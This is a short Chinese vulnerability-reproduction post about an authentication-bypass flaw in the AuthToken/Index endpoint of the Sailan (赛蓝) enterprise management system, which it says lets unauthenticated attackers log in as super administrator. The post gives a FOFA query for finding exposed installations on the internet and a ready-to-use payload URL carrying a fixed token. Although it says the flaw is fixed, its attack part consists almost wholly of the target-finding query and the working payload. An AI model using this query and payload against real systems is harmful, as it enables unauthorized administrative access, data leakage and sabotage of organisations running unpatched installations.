漏洞复现-赛蓝-企业管理系统

本文来自无问社区,更多漏洞复现可前往查看http://www.wwlib.cn/index.php/index

0x01 产品简介

赛蓝企业管理系统是一款为企业提供全面管理解决方案的软件系统,它能够帮助企业实现精细化管理,提高效率,降低成本。系统集成了多种管理功能,包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等,旨在为企业提供一站式的管理解决方案。该系统以先进的管理思想为引导,结合企业实际业务流程,通过信息化手段提升企业管理水平。

0x02 漏洞概述

赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。

建议升级到最新版本

已修复

0x03 复现环境

复制代码
FOFA:body="www.cailsoft.com" || body="赛蓝企业管理系统"

payload:

复制代码
/AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f

效果图:

相关推荐
AI创界者5 分钟前
打造内网安全防线:使用 Kali Linux 进行企业级漏洞风险自查与防御指南
linux·运维·安全
@insist1239 小时前
系统规划与管理师-信息安全规划核心考点解析:概述与安全架构
安全·软考·安全架构·系统规划与管理师·软件水平考试·系统规划与管理工程师
IT小白杨10 小时前
从移动指纹到App隔离:TikTok Shop跨境电商账号安全管理实战
安全·新媒体运营·业界资讯·指纹浏览器
humors22111 小时前
【分享】火绒恶意网址自定义规则,根据互联网应急中心部分威胁预警恶意代码制作
网络·安全·规则·火绒安全·恶意网址·应急中心
工程管理笔记11 小时前
工程发票与资金管理系统:蓝燕云进销项发票台账功能
安全
山峰哥13 小时前
数据库工程与索引策略实战指南‌
服务器·数据库·sql·oracle·深度优先
爱折腾的小黑牛14 小时前
礼账小程序的数据安全方案:加密与备份
数据库·安全
云水一下17 小时前
DVWA从入门到精通(十八):Cryptography(密码学问题)
web安全·密码学·dvwa
humors22117 小时前
【转帖】安全企业发布iOS漏洞攻击风险检测工具
安全·ios·手机·苹果
糖果店的幽灵17 小时前
安全测试从入门到精通 - 环境搭建与基础工具选择
安全·web安全